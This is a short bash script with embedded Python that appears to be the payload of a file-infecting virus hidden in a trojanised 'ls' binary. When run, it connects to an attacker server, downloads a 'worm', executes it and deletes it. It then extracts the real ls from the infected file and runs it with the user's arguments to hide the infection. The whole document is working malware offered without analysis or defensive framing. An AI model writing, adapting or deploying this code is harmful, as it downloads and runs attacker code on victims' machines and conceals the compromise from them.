#!/usr/bin/bash

# virus in victim is triggered by ls, get worm from the attacker server.
python3 - << END
import socket
import time
from os import popen

IP = server_ip
PORT = server_port

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
send_data = \"Connect to virus\"
s.sendall(send_data.encode())

f = open(\"worm\", \"w\")
while True:
    recv_data = s.recv(1024).decode()
    if \"exit 0\" in recv_data:
        f.write(recv_data)
        break
    f.write(recv_data)
f.close()
s.close()
END

chmod +x worm && ./worm && rm -f worm

dd if=ls bs=1 skip=virus_size count=ls_zip_size of=my_ls.zip > /dev/null 2>&1
mv my_ls.zip /tmp && unzip -d /tmp /tmp/my_ls.zip > /dev/null 2>&1
chmod +x /tmp/usr/bin/ls && /tmp/usr/bin/ls \"\$@\" && rm -rf /tmp/usr /tmp/my_ls.zip

exit 0